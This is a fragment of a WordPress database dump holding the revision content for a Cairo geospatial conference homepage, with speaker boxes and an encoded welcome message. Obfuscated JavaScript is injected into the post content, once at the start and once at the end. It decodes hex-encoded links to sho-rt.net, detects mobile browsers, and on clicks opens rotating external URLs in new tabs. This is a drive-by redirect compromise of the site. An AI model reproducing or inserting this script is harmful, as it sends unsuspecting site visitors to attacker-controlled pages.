_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:10:11','2022-10-05 18:10:11','',2167,'https://gsw2023.com/?p=2304',0,'revision','',0),
(2305,1,'2022-10-05 18:11:57','2022-10-05 18:11:57','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994402230{margin-left: 20px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 